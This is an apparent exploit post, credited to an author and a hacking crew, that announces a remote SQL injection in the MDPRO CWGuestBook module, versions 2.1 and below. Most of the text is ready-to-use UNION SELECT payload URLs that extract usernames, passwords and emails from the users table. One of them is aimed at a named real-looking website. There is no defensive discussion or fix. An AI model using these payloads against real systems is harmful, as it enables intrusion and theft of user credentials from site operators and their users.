MDPRO CWGuestBook versions 2.1 and below suffer from a remote SQL injection vulnerability.
933a13210ef9d26761a83106d568012915f4bcfae7df787fa94972dc5e1187bc
######################################################################################
#
#
# Author: Dante90, WaRWolFz
Crew #
# Title: [0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By
Dante90 #
# MSN: dante90.dmc4@hotmail.it
#
# Web: www.warwolfz.org
#
#
#
######################################################################################
[0-Day] MDPRO CWGuestBook <= v2.1 Mod Remote SQL Injection By Dante90
[code]
http://www.victime_site.org/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14UNION
SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE
pn_uid=2--
[/code]
Example:
[code]
http://www.lacinium.com/modules.php?op=modload&name=CWGuestBook&file=index&req=viewrecords&rid=-14UNION
SELECT 1,pn_uname,pn_pass,pn_email,5,pn_uid,7,8,9 FROM md_users WHERE
pn_uid=2--
[/code]
Dante90